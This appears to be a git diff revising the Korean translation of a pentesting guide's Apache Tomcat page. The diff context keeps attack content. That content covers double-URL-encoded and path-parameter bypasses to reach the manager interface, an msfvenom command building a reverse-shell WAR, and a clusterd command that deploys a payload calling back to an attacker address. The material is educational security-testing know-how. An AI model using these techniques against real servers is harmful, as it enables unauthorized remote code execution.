diff --git a/network-services-pentesting/pentesting-web/tomcat/README.md b/network-services-pentesting/pentesting-web/tomcat/README.md index 8543c2cb8..9accfde67 100644 --- a/network-services-pentesting/pentesting-web/tomcat/README.md +++ b/network-services-pentesting/pentesting-web/tomcat/README.md @@ -75,9 +75,9 @@ Along with setting various parameters in Metasploit to target a specific host. ### **Double URL Encoding** -`mod_jk`의 CVE-2007-1860 취약점은 이중 URL 인코딩 경로 탐색을 허용하여, 특별히 제작된 URL을 통해 관리 인터페이스에 무단 접근할 수 있게 합니다. +`mod_jk`의 CVE-2007-1860 취약점은 이중 URL 인코딩 경로 탐색을 허용하여, 특별히 조작된 URL을 통해 관리 인터페이스에 무단 접근할 수 있게 합니다. -Tomcat의 관리 웹에 접근하려면 다음으로 이동하십시오: `pathTomcat/%252E%252E/manager/html` +Tomcat의 관리 웹에 접근하려면 다음 경로로 이동하십시오: `pathTomcat/%252E%252E/manager/html` ### /examples @@ -112,15 +112,15 @@ Apache Tomcat 버전 4.x에서 7.x까지는 정보 노출 및 교차 사이트 예를 들어, `www.vulnerable.com/lalala/..;/manager/html`에 접근하여 **Tomcat 관리자** 페이지에 접근할 수 있을 것입니다. -이 트릭을 사용하여 보호된 경로를 우회하는 **또 다른 방법**은 `http://www.vulnerable.com/;param=value/manager/html`에 접근하는 것입니다. +**또 다른 방법**으로는 이 트릭을 사용하여 보호된 경로를 우회하는 것이며, `http://www.vulnerable.com/;param=value/manager/html`에 접근하는 것입니다. ## RCE -마지막으로, Tomcat 웹 애플리케이션 관리에 접근할 수 있다면, **.war 파일을 업로드하고 배포할 수 있습니다(코드 실행)**. +마지막으로, Tomcat 웹 애플리케이션 관리에 접근할 수 있다면 **.war 파일을 업로드하고 배포할 수 있습니다 (코드 실행)**. ### Limitations -**충분한 권한**(역할: **admin**, **manager** 및 **manager-script**)이 있는 경우에만 WAR를 배포할 수 있습니다. 이러한 세부정보는 일반적으로 `/usr/share/tomcat9/etc/tomcat-users.xml`에 정의된 _tomcat-users.xml_에서 찾을 수 있습니다(버전마다 다를 수 있음) (자세한 내용은 [POST ](./#post)section). +**충분한 권한**(역할: **admin**, **manager** 및 **manager-script**)이 있는 경우에만 WAR 파일을 배포할 수 있습니다. 이러한 세부정보는 일반적으로 `/usr/share/tomcat9/etc/tomcat-users.xml`에 정의된 _tomcat-users.xml_에서 찾을 수 있습니다 (버전마다 다를 수 있습니다) (자세한 내용은 [POST ](./#post)section). ```bash # tomcat6-admin (debian) or tomcat6-admin-webapps (rhel) has to be installed @@ -143,7 +143,7 @@ msf exploit(multi/http/tomcat_mgr_upload) > exploit 1. 배포할 war 파일 생성: ```bash -msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war -o revshell.war +msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war -o revshell.war ``` 2. `revshell.war` 파일을 업로드하고 접근합니다 (`/revshell/`): @@ -163,7 +163,7 @@ git clone https://github.com/mgeeky/tomcatWarDeployer.git ```bash ./tomcatWarDeployer.py -U -P -p :/manager/html/ ``` -### Using [Culsterd](https://github.com/hatRiot/clusterd) +### [Culsterd](https://github.com/hatRiot/clusterd) 사용하기 ```bash clusterd.py -i 192.168.1.105 -a tomcat -v 5.5 --gen-payload 192.168.1.6:4444 --deploy shell.war --invoke --rand-payload -o windows ``` @@ -226,7 +226,7 @@ msf> use post/windows/gather/enum_tomcat * [https://github.com/p0dalirius/ApacheTomcatScanner](https://github.com/p0dalirius/ApacheTomcatScanner) -## 참고자료 +## 참고문헌 * [https://github.com/simran-sankhala/Pentest-Tomcat](https://github.com/simran-sankhala/Pentest-Tomcat) * [https://hackertarget.com/sample/nexpose-metasploitable-test.pdf](https://hackertarget.com/sample/nexpose-metasploitable-test.pdf)